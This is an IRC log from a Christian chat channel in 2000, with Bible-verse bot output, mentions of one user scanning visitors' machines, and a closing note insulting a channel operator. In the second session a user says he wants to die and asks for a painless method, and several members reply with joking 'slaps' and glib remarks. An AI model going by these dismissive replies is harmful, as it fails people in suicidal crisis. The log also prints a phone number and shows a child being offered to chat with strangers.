[02:26] *** Shaina` (Home@PPP209-167-45-81.tintopp.com) has joined #CHristian
[02:26] <AceRadio> Welcome to #Christian, shaina`
[02:27] *** CodePoet (kenneth@yak-p2-14.wolfenet.com) Quit (The quest for faith is a lunar
endevour, not warmer and brighter, but darker and wetter.)
[02:27] <AceRadio> !niv jeremiah 4:2
[02:27] <logos3> AceRadio: Jeremiah 4:2 "2 and if in a truthful, just and righteous way you
swear, 'As surely as the LORD lives,' then the nations will be blessed by him and in him
they will glory.'" (NIV)
[02:27] <Shaina`> thanks for welcome me AceRadio
[02:27] <AceRadio> yw
[02:28] <Shaina`> :)
[02:28] <AceRadio> !niv luke 4:9
[02:28] <logos3> AceRadio: Luke 4:9 "9 The devil led him to Jerusalem and had him stand on
the highest point of the temple. 'If you are the Son of God,' he said, 'throw yourself down
from here." (NIV)
[02:28] <TacoMan> anyone want to see a funny log message me
[02:28] <TopTed> !kjv proverbs 30:4
[02:28] <logos3> TopTed: Proverbs 30:4 "4 Who hath ascended up into heaven, or descended?
who hath gathered the wind in his fists? who hath bound the waters in a garment? who hath
established all the ends of the earth? what is his name, and what is his son's name, if thou
canst tell?" (KJV)
[02:29] *** Bond-007 (PBrosnan@17-133.nctimes.net) Quit (Ping timeout for
Bond-007[17-133.nctimes.net])
[02:29] <AceRadio> !niv psalm 1:45
[02:29] <logos3> AceRadio: Psalm 1:45 "" (NIV)
[02:29] <AceRadio> !niv psalm 14:5
[02:29] <logos3> AceRadio: Psalm 14:5 "5 There they are, overwhelmed with dread, for God is
present in the company of the righteous." (NIV)
[02:30] <TopTed> !kjv luke 4:20-21
[02:30] <logos3> TopTed: Luke 4:20-21 "20 And he closed the book, and he gave it again to
the minister, and sat down. And the eyes of all them that were in the synagogue were
fastened on him. 21 And he began to say unto them, This day is this
[02:30] <logos3> scripture fulfilled in your ears." (KJV)
[02:30] *** Luther (~Boggs@iq-col-as000-158.iquest.net) has left #CHristian
[02:31] *** TacoMan (taco_man17@pm3a-176.dillon.mcn.net) Quit (Excess Flood)
[02:32] *** charisma (~Jazzman@dx-52.pempe.net) has joined #CHristian
[02:32] <AceRadio> Welcome to #Christian, charisma
[02:33] <Shaina`> how are you AceRadio?
[02:33] *** Helt (cs@cs28150-130.satx.rr.com) has joined #CHristian
[02:33] <AceRadio> Welcome to #Christian, helt
[02:33] <AceRadio> shaina- i'm good
[02:33] *** Helt (cs@cs28150-130.satx.rr.com) has left #CHristian
[02:33] <AceRadio> shaina- u?
[02:33] *** bu2zard (~wanabe@203.106.34.67) has joined #CHristian
[02:33] <AceRadio> Welcome to #Christian bu2zard
[02:33] <Shaina`> AceRadio: i'm great thanks :)
[02:34] <bu2zard> hi
[02:34] *** jamie^16 (~Jazzman@dx-52.pempe.net) has left #CHristian
[02:34] *** bu2zard (~wanabe@203.106.34.67) has left #CHristian
[02:34] *** LARING (IRCop@208.150.130.9) has joined #CHristian
[02:34] <AceRadio> Welcome to #Christian, laring
[02:35] *** LARING (IRCop@208.150.130.9) has left #CHristian
[02:35] *** space[AW] (spacejam@spacejam.linuxroot.net) has joined #CHristian
[02:35] *** jamie^16 (~Jazzman@dx-52.pempe.net) has joined #CHristian
[02:35] <AceRadio> Welcome to #Christian, space[aw]
[02:35] <AceRadio> wb jamie
[02:36] <space[AW]> AceRadio hi.. thanx
[02:36] *** space[AW] is now known as spaceJAM
[02:37] *** aLiCh|gRL (~oink@210.23.210.216) has joined #CHristian
[02:37] <TopTed> oh hum...
[02:37] <AceRadio> Welcome to #Christian, alichigrl
[02:37] <AceRadio> 1:39 am cdt
[02:38] *** AgnusDei (Pucelle@host-216-76-172-44.msy.bellsouth.net) has joined #CHristian
[02:38] *** aLiCh|gRL (~oink@210.23.210.216) Quit (Ping timeout for aLiCh|gRL[210.23.210.216])
[02:38] <Shaina`> it's 2:38am here
[02:38] <AceRadio> Welcome to #Christian, agnusdei
[02:39] <AgnusDei> good evening ace
[02:39] <TopTed> !kjv 1john 2:15
[02:39] <logos3> TopTed: 1John 2:15 "15 Love not the world, neither the things that are in
the world. If any man love the world, the love of the Father is not in him." (KJV)
* Timer 100 halted
* Timer 101 halted
[02:39] * Raid has returned ( Auto-Away: Not here ) - on 02:39:14 @ 09/09/2000 - Away 17
minutes.
[02:39] <AceRadio> wb raid
[02:39] <Raid> crud
[02:39] <Raid> I will sleep soon.
[02:39] <Raid> but first, must smoke this cig.
[02:40] <konfused> brr tis cold here
[02:41] <AceRadio> konfused- grab a blanket
[02:41] <konfused> i have one :o
[02:41] *** sunshineM (chris-p@cx989100-b.orng1.occa.home.com) has joined #CHristian
[02:41] <AceRadio> Welcome to #Christian, sunshinem
[02:42] *** WingNut (psa23@A020-0450.TULS.splitrock.net) Quit (Ping timeout for
WingNut[A020-0450.TULS.splitrock.net])
[02:42] *** Disconnected
Session Close: Sat Sep 09 02:42:36 2000

Session Start: Sat Sep 09 12:25:22 2000


[12:25] *** Now talking in #CHristian
[12:25] -logos3- http://www.forchrist.net - channel website, for rules and other info.
[12:25] <Raid> mornin
[12:26] *** LC (LC@PPPa26-ResaleNashville6-2R7047.saturn.bbn.com) has joined #CHristian
[12:26] *** Txico (peter@cpt-dial-196-30-182-178.mweb.co.za) Quit (Ping timeout for
Txico[cpt-dial-196-30-182-178.mweb.co.za])
[12:26] <CiCi> ok everyone, when Raid's in the channel, all your machines are going to be
scanned so be prepared
[12:27] * CiCi waits for Raid to meet her router that doesn't appreciate script kiddie probes
[12:27] <Raid> CiCi: Actually, I've turned the script off.
[12:28] <Raid> CiCi: I didn't want to risk having to explain what netbios open shares are
again. ;p
[12:28] *** hunnynut (babyliciou@1Cust36.tnt3.league-city.tx.da.uu.net) Quit
[12:29] *** prophecy_ (x-stream.c@freedu-132-79.libertysurf.co.uk) Quit (Leaving)
[12:29] <anyways> anyone else under 15 on this channel?
[12:29] *** Dmel (NA@AC9D6C60.ipt.aol.com) Quit (Leaving)
[12:33] *** SixSteps (unashamed2@dyn203.mm.den.viawest.net) has joined #CHristian
[12:33] *** SixSteps (unashamed2@dyn203.mm.den.viawest.net) has left #CHristian
[12:33] * patience_ will bbl
[12:34] <anyways> any girls wanna chat to Jasmine?
[12:37] <quietloop> is this a flirt channel
[12:37] <anyways> lol
[12:37] <anyways> Jasmine is 9 and she's a girl wanting to chat to another girl her own age
[12:38] <anyways> do you call that flirting?
[12:38] <anyways> :)
[12:38] *** Philip15 (CrAzzy@202.151.216.10) has joined #CHristian
[12:38] <CiCi> I"m not her age, but I'll chat with her if she wants
[12:39] <LC> If jasmine wants to talk to a Baptist preacher...old enough to be her dad...or
grand dad...I will be glad to as well
[12:40] <Raid> lol
[12:40] <anyways> :)
[12:41] <anyways> Thanks for the offer
[12:42] <Raid> /msg LC I thought I'd help you out. Heres my number so your lawyer can
contact me. (310) 883-2304 Ext 620
[12:42] <Raid> doh
[12:42] <Raid> stupid paster
[12:43] <Raid> if im not there, leave a msg with a number; I'll call you back on my dime.
[12:44] * Raid is away since 12:44:05 - 09/09/2000 ( Must find food... Wheres that burger
king? ) - Msgs will be saved.
[12:44] *** patience_ is now known as pataway
[12:44] *** ontario_2 (FlAmEs@d226-92-152.home.cgocable.net) has joined #CHristian
[12:45] *** ontario_2 (FlAmEs@d226-92-152.home.cgocable.net) has left #CHristian
[12:45] *** Adar_Caan (adarcaan@c184662-a.dals1.tx.home.com) has joined #CHristian
[12:45] *** Philip15 (CrAzzy@202.151.216.10) Quit (Ping timeout for Philip15)
[12:48] *** Nell` (Piglet@pool-209-138-214-116.dlls.grid.net) has joined #CHristian
[12:48] *** Nell` (Piglet@pool-209-138-214-116.dlls.grid.net) Quit (Wishing you peace, love
and Souuuuuuuulll train! - Don Cornelius)
[12:48] *** kosmos (~Andromeda@p13-max7.syd.ihug.com.au) has joined #CHristian
[12:49] *** ecomaster (t@A010-0085.MCLN.splitrock.net) has joined #CHristian
[12:49] *** LC (LC@PPPa26-ResaleNashville6-2R7047.saturn.bbn.com) has left #CHristian (Peace
& Protection 4.00 FINAL BETA)
[12:49] *** ecomaster is now known as eminemx
[12:49] <eminemx> hello
[12:49] <eminemx> I need help
[12:49] <anyways> with what?
[12:49] <eminemx> I feel awful
[12:50] <eminemx> I just found out my girlfriend has been cheating on me...I need some
direction
[12:50] <Elijah_> ouch...i'm sorry. :(
[12:50] <anyways> oh dear
[12:50] <anyways> I'm very sorry for you
[12:51] <eminemx> I feel like dying
[12:51] <anyways> That is tough
[12:51] <eminemx> I know she is confused
[12:51] <Elijah_> been there, done that. :(
[12:51] <anyways> are you a christian and is your g/f?
[12:51] <eminemx> I am ...she is not =(
[12:52] * kosmos -------(o<----(o<----(o<-
[12:52] *** aphrael (phumba@j39.kch20.jaring.my) Quit (Leaving)
[12:54] <eminemx> I want to die!
[12:54] <eminemx> but I dont know how
[12:54] <eminemx> painless
[12:54] <eminemx> fast
[12:54] * kosmos slaps eminemx around a bit with a Pirahna
[12:54] <quietloop> dying is easy ... living is hard
[12:55] <pataway> (((((((((( eminemx ))))))))))
[12:55] <quietloop> i want to live
[12:55] <quietloop> easy is no goot
[12:55] <anyways> hey, there's tons of things I could tell you right now, but I don't think
they're things you want to hear just now
[12:55] <eminemx> what
[12:55] <eminemx> please say something
[12:55] <anyways> well
[12:55] <eminemx> I am crying like a d*** baby!
[12:55] <pataway> dying wont solve anything
[12:55] * kosmos picks up the nearest cement mixer and slams it on eminemx's head.
[12:55] <quietloop> crying is goot
[12:55] <pataway> kosmos you7re not helpin
[12:55] *** Disconnected
Session Close: Sat Sep 09 13:13:06 2000

These text files comprise the war with Undernet IRCop CiCi
so far. As you can see by reading the files yourself, She isn't
qualified for her position. She be way too dumb.

Вам также может понравиться